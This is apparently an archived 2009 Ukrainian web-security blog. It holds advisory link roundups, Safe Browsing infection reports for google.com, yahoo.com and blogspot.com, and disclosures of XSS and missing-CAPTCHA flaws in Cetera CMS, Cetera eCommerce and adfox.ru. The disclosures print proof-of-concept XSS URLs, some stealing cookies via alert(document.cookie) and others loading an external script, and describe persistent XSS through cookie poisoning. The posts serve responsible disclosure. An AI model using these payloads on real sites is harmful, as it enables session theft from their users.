Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• CA ARCserve Backup DB Engine Denial of Service (деталі)
• CA ARCserve Backup Tape Engine Denial of Service (деталі)
• CA BrightStor ARCServe BackUp Message Engine Remote Command Injection Vulnerability (деталі)
• CA ARCserve Backup Multiple Vulnerabilities (деталі)
• MULTIPLE REMOTE VULNERABILITIES my-colex 1.4.2 (деталі)
• MULTIPLE REMOTE VULNERABILITIES my-Gesuad 0.9.14 (деталі)
• Multiple XSS in Sun Communications Express (деталі)
• (GET vars ‘x’ & ‘y’) ADMIN FUNCTION EXECUTION Jorp v1.3.05.09 (деталі)
• INSECURE COOKIE HANDLING VULNERABILITIES Dog Pedigree Online Database v1.0.1-Beta (деталі)
• (GET var ‘id’) BLIND SQL INJECTION EXPLOIT Dog Pedigree Online Database v1.0.1-Beta (деталі)

30.10.2009

У березні, 01.03.2009, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

23.12.2009

Insufficient Anti-automation:

http://site/

http://site/account/

В формах на даних сторінках відсутній захист від автоматизованих запитів (капча).

XSS:

http://site/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі Cetera eCommerce 14.0 та попередні версії. Розробники в себе на сайті уразливості не виправили (окріх двох останніх XSS), як це видно по цій дірці:

XSS:

• alert(document.cookie)
• цікавий
• html включення

Окрім наведених уразливостей, в системі є ще persistent XSS, роботу якої я раніше вже продемонстрував розробникам системи на їх власному сайті .

В даній добірці уразливості в веб додатках:

• WMI Mapper for HP Systems Insight Manager Running on Windows, Remote Unauthorized Access to Data, Local Unauthorized Access (деталі)
• FormMail 1.92 Multiple Vulnerabilities (деталі)
• User options changer (SQLi) EXPLOIT Bigace CMS stable release 2.5 (деталі)
• Belkin BullDog Plus UPS-Service Buffer Overflow Vulnerability (деталі)
• Drupal 6 CCK Module XSS Vulnerability (деталі)
• Novell GroupWise Web Access Multiple XSS (деталі)
• MULTIPLE SQL INJECTION VULNERABILITIES Flash Quiz Beta 2 (деталі)
• IPsession SQL Injection Vulnerability (деталі)
• Drupal 6.12 (core) User Module XSS Vulnerability (деталі)
• DMXReady Registration Manager Arbitrary File Upload Vulnerability (деталі)

Коли я виявив можливість використання Safe Browsing від Google для перевірки сайтів на інфікованість, першим ділом я провів діагностику декількох популярних веб сайтів. І я отримав доволі цікаві результати .

Серед найперших перевірених мною сайтів були google.com, yahoo.com та blogspot.com, які виявилися інфікованими (за останні 90 днів). Те, що blogspot.com (це один з доменів сервіса Гугла Blogger) виявився інфікованим, це мене не здивувало, бо я ще торік писав про те, що даний ресурс Google використовується для розповсюдження шкідливих кодів (по даним Sophos), а ось те, що сам google.com був інфікований, а також yahoo.com, це вже новина.

Діагностична сторінка Google Safe Browsing для google.com повідомляє про те, що:

Цей сайт наразі не входить до переліку підозрілих.

Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 разів протягом останніх 90 днів.

А також:

З 70146 сторінок, які ми перевірили на сайті протягом останніх 90 днів, з 4 сторінок без дозволу користувача було завантажено і встановлено зловмисне програмне забезпечення. Останнього разу Google відвідував цей сайт 2009-12-19, і підозрілий уміст був знайдений на цьому сайті 2009-12-16.

Malicious software includes 7 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Також інформація про те, що зловмисне програмне забезпечення присутнє в 14 доменах, що 7 доменів є посередниками поширення зловмисних програм серед відвідувачів сайта, а також:

За останні 90 днів сайт google.com був посередником зараження 10 сайтів, включаючи apostei.net/, www.jazaan.com.googlepages.com/, debsh2.mihanblog.com/.

Так що сайт Гугла був нещодавно інфікований (16.12.2009). Після чого він був очищений від інфекції, але факт залишається фактом.

Таким чином Information Leakage в даному сервісі Гугла призвела до витоку інформації про зараженність власного сайта. Це такий гумор у Гугла - оприлюднювати інформацію про інфікованість власних сайтів . З іншої сторони - це добре, що Гугл чесно це визнав.

Діагностична сторінка Google Safe Browsing для yahoo.com повідомляє про те, що:

Цей сайт наразі не входить до переліку підозрілих.

Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 разів протягом останніх 90 днів.

А також:

З 17710 сторінок, які ми перевірили на сайті протягом останніх 90 днів, з 15 сторінок без дозволу користувача було завантажено і встановлено зловмисне програмне забезпечення. Останнього разу Google відвідував цей сайт 2009-12-19, і підозрілий уміст був знайдений на цьому сайті 2009-12-13.

Malicious software includes 113 scripting exploit(s), 58 trojan(s), 8 exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine.

Також інформація про те, що зловмисне програмне забезпечення присутнє в 25 доменах, що 13 доменів є посередниками поширення зловмисних програм серед відвідувачів сайта.

Як видно, Yahoo пішов по стопам Гугла.

Діагностична сторінка Google Safe Browsing для blogspot.com повідомляє про те, що:

Цей сайт наразі не входить до переліку підозрілих.

Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 462 разів протягом останніх 90 днів.

А також:

З 2112321 сторінок, які ми перевірили на сайті протягом останніх 90 днів, з 19127 сторінок без дозволу користувача було завантажено і встановлено зловмисне програмне забезпечення. Останнього разу Google відвідував цей сайт 2009-12-19, і підозрілий уміст був знайдений на цьому сайті 2009-12-19.

Malicious software includes 21423 worm(s), 11635 trojan(s), 3186 scripting exploit(s). Successful infection resulted in an average of 16 new process(es) on the target machine.

Також інформація про те, що зловмисне програмне забезпечення присутнє в 3825 доменах, що 1592 домена є посередниками поширення зловмисних програм серед відвідувачів сайта, а також:

За останні 90 днів сайт blogspot.com був посередником зараження 23 сайтів, включаючи euroddl.com/, alfawarez.com/, ddlspot.com/.

А також:

Так, цей сайт поширював зловмисне програмне забезпечення протягом останніх 90 днів. Він заразив 9 домен(-ів), включаючи tisuituputih.blogspot.com/, enfermagemsu.blogspot.com/, elltoro.com/.

В даній добірці уразливості в веб додатках:

• HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS), Execute Arbitrary Code (деталі)
• HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS) (деталі)
• Vulnerabilities in squirrelmail (деталі)
• (GET var ‘member’) BLIND SQL INJECTION EXPLOIT FAMILY CONNECTIONS <= v1.9 (деталі)
• maxcms2.0 creat new admin exploit (деталі)
• Syhunt: A-A-S (Application Access Server) Multiple Security Vulnerabilities (деталі)
• AjaxTerm session id collision (деталі)
• (POST var ‘rating’) BLIND SQL INJECTION microTopic v1 Initial Release (деталі)
• Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit (деталі)
• Trend Micro Products Web Management Authentication Bypass (деталі)

31.07.2009

У грудні, 08.12.2008, я знайшов Cross-Site Scripting та Cookie Poisoning уразливості на проекті http://adfox.ru (банерна мережа). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.12.2009

Уразливості на домені https://login.adfox.ru.

XSS:

• alert(document.cookie)

Cookie Poisoning:

Можлива persistent XSS атака через Cookie Poisoning. При встановленні XSS коду в значенні кукіса amacsAccount, можна виконати код при кожному відвідуванні сторінки https://login.adfox.ru. Це можна зробити або через вищезгадану XSS дірку, або через дірки в браузерах.

Дані уразливості вже виправлені.

В даній добірці уразливості в веб додатках:

• Re: MicroWorld MailScan - Multiple Vulnerabilities within Admin-Webinterface (деталі)
• TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit (деталі)
• Vpopmail/QmailAdmin User’s Quota Multiple Integer Overflows (деталі)
• BLIND SQL INJECTION exploit (GET var ‘AlbumID’) RTWebalbum 1.0.462 (деталі)
• Claroline v.1.8.11 Cross-Site Scripting (деталі)
• HP OpenView Products Shared Trace Service Denial of Service (деталі)
• HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS) (деталі)
• MULTIPLE SQL INJECTION VULNERABILITIES Shutter v-0.1.1 (деталі)
• MULTIPLE CODE INJECTION VULNERABILITIES TUENTI SPAIN (деталі)
• activeCollab XSS and Full Path Disclosure (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах DM Albums та Google Analytics. Для котрих з’явилися експлоіти. DM Albums - це плагін для створення фото альбомів та галерей, Google Analytics - це плагін для інтергації з системою Google Analytics.

• Численні уразливості в WordPress DM Albums Plugin (деталі)
• Google Analytics plugin for Wordpress - XSS Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

29.10.2009

У березні, 01.03.2009, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі Cetera CMS. Які виявив на офіційному сайті системи http://www.cetera.ru.

Раніше я вже писав про уразливість в Cetera CMS.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

16.12.2009

Insufficient Anti-automation:

http://site/support/default.php?project=1

Відсутній захист від автоматизованих запитів (капча).

XSS:

http://site/support/default.php?project=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E
http://site/support/default.php?project=1&lang=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E
http://site/support/default.php?project=1&name=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E

Та через заголовки User-Agent, Accept-Language та Referer:

Уразливі Cetera CMS v2.9.0 та попередні версії. Розробники в себе на сайті на Cetera CMS виправили XSS уразливості, але не виправили Insufficient Anti-automation.

В даній добірці уразливості в веб додатках:

• Persistent XSS in Kayako Support Suite (деталі)
• Secunia Research: Trend Micro OfficeScan Directory Traversal Vulnerability (деталі)
• Sun Glassfish Enterprise Server - Multiple Linked XSS vulnerabilies (деталі)
• Sun Glassfish Woodstock Project - Linked XSS Vulnerability (деталі)
• MULTIPLE REMOTE VULNERABILITIES TemaTres 1.0.3 (деталі)
• BLIND SQL INJECTION EXPLOIT TemaTres 1.0.3 (деталі)
• IceWarp WebMail Server: SQL Injection in Groupware Component (деталі)
• IceWarp WebMail Server: Cross Site Scripting in Email View (деталі)
• IceWarp WebMail Server: User-assisted Cross Site Scripting in RSS Feed Reader (деталі)
• Apple’s Mail.app stores your S/MIME encrypted emails in clear text (деталі)